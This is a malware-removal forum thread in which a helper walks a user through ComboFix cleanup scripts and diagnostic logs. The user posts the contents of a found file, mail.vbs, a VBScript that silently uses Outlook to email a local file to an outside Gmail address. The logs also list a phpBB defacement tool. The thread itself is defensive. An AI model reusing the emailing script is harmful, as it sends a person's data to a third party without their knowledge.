S3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

.
Contents of the 'Scheduled Tasks' folder
"2008-06-02 19:00:31 C:\WINDOWS\Tasks\A4277F9291B0F052.job"
- c:\docume~1\n\applic~1\movesi~1\Face Bash Test.exe
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, [Link visible only to logged-in users]
Rootkit scan 2008-06-02 21:47:47
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\UAService7.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\ati2evxx.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\Ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
.
**************************************************************************
.
Completion time: 2008-06-02 21:53:05 - machine was rebooted [n]
ComboFix-quarantined-files.txt 2008-06-02 19:52:51

Pre-Run: 28,894,609,408 bytes free
Post-Run: 29,270,118,400 bytes free

252 --- E O F --- 2008-05-16 20:47:53

  • dr_Bora
  • Anti Malware Fighter, Rank 2
  • Joined: 24 Jul 2007
  • Posts: 12280
  • Location: Höganäs, SE

Right-click the file C:\mail.vbs and choose Edit. The file will open in Notepad. Copy the contents of that file here.

-------------------------------------------------------------------------------------

Then... open Notepad and copy the following text into it:



File::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job


Folder::
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Program Files\move sixth tool
C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Program Files\Circle Developement

DirLook::
C:\Program Files\Ashiyane Digital Security Team

Registry::
[-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
[-HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RealInter"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"bend logo clock film"=-

Save the file from Notepad to the Desktop as "CFScript".

Drag the saved script/text onto the ComboFix icon as shown in the picture.
Post the log that is created at the end of the cleaning/scan in your next message.

  • Joined: 19 May 2008
  • Posts: 5
  • Location: beograd

Dim x
on error resume next 
Set fso ="Scripting.FileSystem.Object" 
Set so=CreateObject(fso) 
Set ol=CreateObject("Outlook.Application") 
Set out= WScript.CreateObject("Outlook.Application") 
Set Mail=ol.CreateItem(0) 
Mail.to="hard.rock.blogger@gmail.com" 
Mail.Subject="IP" 
Mail.Body="IP" 
Mail.Attachments.Add("c:bla.txt")
Mail.Send 
ol.Quit


ComboFix 08-06-01.6 - n 2008-06-03 14:02:44.3 - NTFSx86
Microsoft Windows XP Professional  5.1.2600.2.1252.1.1033.18.219 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\n\Desktop\CFScript.txt
 * Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!

FILE ::
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\system32\xhvgmvfa.dll
C:\WINDOWS\Tasks\A4277F9291B0F052.job
.

(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\All Users\Application Data\Frag great bend logo
C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
C:\Documents and Settings\n\Application Data\move sixth tool
C:\Documents and Settings\n\Application Data\move sixth tool\0
C:\Documents and Settings\n\Application Data\move sixth tool\2mfcdtheseek.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Bat flag close.exe
C:\Documents and Settings\n\Application Data\move sixth tool\boblasuq.exe
C:\Documents and Settings\n\Application Data\move sixth tool\Face Bash Test.exe
C:\Documents and Settings\NetworkService\Application Data\move sixth tool
C:\Documents and Settings\NetworkService\Application Data\move sixth tool\Bat flag close.exe
C:\Program Files\Circle Developement
C:\Program Files\Circle Developement\Uninstall.exe
C:\Program Files\move sixth tool
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
C:\WINDOWS\Tasks\A4277F9291B0F052.job

.
(((((((((((((((((((((((((   Files Created from 2008-05-03 to 2008-06-03  )))))))))))))))))))))))))))))))
.

2008-06-02 22:05 . 2008-06-02 22:05   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 13:44   2,280   --a------   C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34   <DIR>   d--------   C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41   <DIR>   d--------   C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30   <DIR>   d--------   C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12   <DIR>   d--------   C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21   75   --a------   C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47   <DIR>   d--------   C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47   <DIR>   d--------   C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39   483,328   --a------   C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52   <DIR>   d--------   C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28   41,296   --a------   C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57   <DIR>   d--------   C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 13:45   <DIR>   d--------   C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23   <DIR>   d--------   C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19   691,545   --a------   C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37   2,546   --a------   C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51   <DIR>   d--hsc---   C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16   <DIR>   d--------   C:\Program Files\Spybot - Search & Destroy

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27   ---------   d-----w   C:\Program Files\ESET
2008-05-27 19:26   ---------   d-----w   C:\Program Files\MSN Messenger
2008-05-27 19:25   ---------   d-----w   C:\Program Files\Messenger Plus! Live
2008-05-27 18:35   ---------   d-----w   C:\Program Files\Common Files\Adobe
2008-05-26 19:48   ---------   d-----w   C:\Program Files\Macrogaming
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Free Download Manager
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Championship Manager 5
2008-05-26 19:46   ---------   d-----w   C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23   81,920   ----a-w   C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23   47,360   ----a-w   C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23   ---------   d-----w   C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38   ---------   d-----w   C:\Program Files\Yahoo!
2008-05-16 18:36   ---------   d--h--w   C:\Program Files\InstallShield Installation Information
2008-05-12 17:04   ---------   d-----w   C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50   ---------   d-----w   C:\Program Files\Windows Live
2008-04-28 20:03   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59   ---------   d-----w   C:\Program Files\Lystech Computing
2008-04-21 17:34   744   ----a-w   C:\mail.vbs
2008-04-18 19:19   ---------   d-----w   C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14   ---------   d-----w   C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08   ---------   d-----w   C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37   ---------   d-----w   C:\Program Files\MauZ Php Editor
2008-04-09 15:01   ---------   d-----w   C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45   ---------   d-----w   C:\Program Files\Apple Software Update
2008-04-07 15:44   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13   1,388,544   ----a-w   C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17   ---------   d-----w   C:\Program Files\Vista Start Menu
2008-04-04 18:50   64,650   ----a-w   C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50   6,106   ----a-w   C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50   218,624   ----a-w   C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18   720,896   ----a-w   C:\WINDOWS\iun6002.exe
2008-03-27 08:12   151,583   ----a-w   C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28   126,976   ----a-w   C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47   1,845,248   ----a-w   C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00   524,300   ----a-w   C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28   1,164,456   ----a-w   C:\Program Files\install_flash_player.exe
.

((((((((((((((((((((((((((((((((((((((((((((   Look   )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.

---- Directory of C:\Program Files\Ashiyane Digital Security Team ----

2000-05-22 10:00   115920   --a------   C:\Program Files\Ashiyane Digital Security Team\PHPBB DEFACER\Msinet.ocx


(((((((((((((((((((((((((((((   snapshot@2008-06-02_21.52.17.68   )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 11:43:09   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45   402872   --a------   C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

*Newly Created Service* - CATCHME
.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 14:04:46
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-06-03 14:05:42
ComboFix-quarantined-files.txt  2008-06-03 12:05:38
ComboFix2.txt  2008-06-02 19:53:06

Pre-Run: 29,282,066,432 bytes free
Post-Run: 29,268,369,408 bytes free

201   --- E O F ---   2008-05-16 20:47:53

  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Joined: 24 Jul 2007
  • Posts: 12280
  • Where do you live: Höganäs, SE

Hmm...

Go ahead and delete the folder: C:\Program Files\Ashiyane Digital Security Team

and the file: C:\mail.vbs .

Restart the computer and post a fresh ComboFix log (just run it with a double-click and wait for it to finish scanning so that you get the log).

Also, write how things are now.

  • Joined: 19 May 2008
  • Posts: 5
  • Where do you live: Belgrade

ComboFix 08-06-01.6 - n 2008-06-03 17:42:24.4 - NTFSx86
Microsoft Windows XP Professional  5.1.2600.2.1252.1.1033.18.173 [GMT 2:00]
Running from: C:\Documents and Settings\n\Desktop\ComboFix.exe
 * Resident AV is active


WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

(((((((((((((((((((((((((   Files Created from 2008-05-03 to 2008-06-03  )))))))))))))))))))))))))))))))
.

2008-06-03 15:22 . 2008-06-03 15:22   <DIR>   d--------   C:\Documents and Settings\n\Application Data\ESET
2008-06-03 15:20 . 2008-06-03 15:20   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\ESET
2008-06-02 22:05 . 2008-06-02 22:05   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Avg8
2008-06-02 21:32 . 2008-06-03 17:26   2,280   --a------   C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:27 . 2008-06-02 21:34   <DIR>   d--------   C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-01 20:40 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41   <DIR>   d--------   C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30   <DIR>   d--------   C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12   <DIR>   d--------   C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48   <DIR>   d--------   C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21   75   --a------   C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47   <DIR>   d--------   C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47   <DIR>   d--------   C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39   483,328   --a------   C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52   <DIR>   d--------   C:\Program Files\BearShare Applications
2008-05-14 03:28 . 2008-05-14 03:28   41,296   --a------   C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57   <DIR>   d--------   C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-03 17:27   <DIR>   d--------   C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23   <DIR>   d--------   C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19   691,545   --a------   C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37   2,546   --a------   C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51   <DIR>   d--hsc---   C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50   <DIR>   d--------   C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16   <DIR>   d--------   C:\Program Files\Spybot - Search & Destroy

.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-03 13:20   ---------   d-----w   C:\Program Files\ESET
2008-05-27 19:26   ---------   d-----w   C:\Program Files\MSN Messenger
2008-05-27 19:25   ---------   d-----w   C:\Program Files\Messenger Plus! Live
2008-05-27 18:35   ---------   d-----w   C:\Program Files\Common Files\Adobe
2008-05-26 19:48   ---------   d-----w   C:\Program Files\Macrogaming
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Free Download Manager
2008-05-26 19:47   ---------   d-----w   C:\Program Files\Championship Manager 5
2008-05-26 19:46   ---------   d-----w   C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23   81,920   ----a-w   C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23   47,360   ----a-w   C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23   ---------   d-----w   C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38   ---------   d-----w   C:\Program Files\Yahoo!
2008-05-16 18:36   ---------   d--h--w   C:\Program Files\InstallShield Installation Information
2008-05-12 17:04   ---------   d-----w   C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50   ---------   d-----w   C:\Program Files\Windows Live
2008-04-28 20:03   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 16:59   ---------   d-----w   C:\Program Files\Lystech Computing
2008-04-18 19:19   ---------   d-----w   C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14   ---------   d-----w   C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08   ---------   d-----w   C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37   ---------   d-----w   C:\Program Files\MauZ Php Editor
2008-04-09 15:01   ---------   d-----w   C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45   ---------   d-----w   C:\Program Files\Apple Software Update
2008-04-07 15:44   ---------   d-----w   C:\Documents and Settings\All Users\Application Data\Apple
2008-04-06 20:13   1,388,544   ----a-w   C:\WINDOWS\system32\msvbvm60.dll
2008-04-04 19:17   ---------   d-----w   C:\Program Files\Vista Start Menu
2008-04-04 18:50   64,650   ----a-w   C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50   6,106   ----a-w   C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 18:50   218,624   ----a-w   C:\WINDOWS\system32\uxtheme.dll
2008-04-04 10:18   720,896   ----a-w   C:\WINDOWS\iun6002.exe
2008-03-27 08:12   151,583   ----a-w   C:\WINDOWS\system32\msjint40.dll
2008-03-23 14:28   126,976   ----a-w   C:\WINDOWS\system32\UAService7.exe
2008-03-19 09:47   1,845,248   ----a-w   C:\WINDOWS\system32\win32k.sys
2007-11-05 12:00   524,300   ----a-w   C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28   1,164,456   ----a-w   C:\Program Files\install_flash_player.exe
.

(((((((((((((((((((((((((((((   snapshot@2008-06-02_21.52.17.68   )))))))))))))))))))))))))))))))))))))))))
.
- 2008-06-02 19:46:45   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 15:25:24   2,048   --s-a-w   C:\WINDOWS\bootstat.dat
+ 2008-06-03 13:22:30   10,134   ----a-r   C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\callmsi.exe
+ 2008-06-03 13:22:30   140,544   ----a-r   C:\WINDOWS\Installer\{9DE8D465-A169-4CC7-BAF7-CDD1C9E2EE56}\egui.exe
+ 2008-03-13 14:43:42   40,456   ----a-w   C:\WINDOWS\system32\drivers\eamon.sys
+ 2008-03-13 14:44:36   29,704   ----a-w   C:\WINDOWS\system32\drivers\easdrv.sys
+ 2008-03-13 14:52:12   71,176   ----a-w   C:\WINDOWS\system32\drivers\epfw.sys
+ 2008-03-13 14:52:16   30,728   ----a-w   C:\WINDOWS\system32\drivers\epfwndis.sys
+ 2008-03-13 14:52:16   54,280   ----a-w   C:\WINDOWS\system32\drivers\epfwtdi.sys
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45   402872   --a------   C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"egui"="C:\Program Files\ESET\ESET Smart Security\egui.exe" [2008-03-13 16:48 1443072]

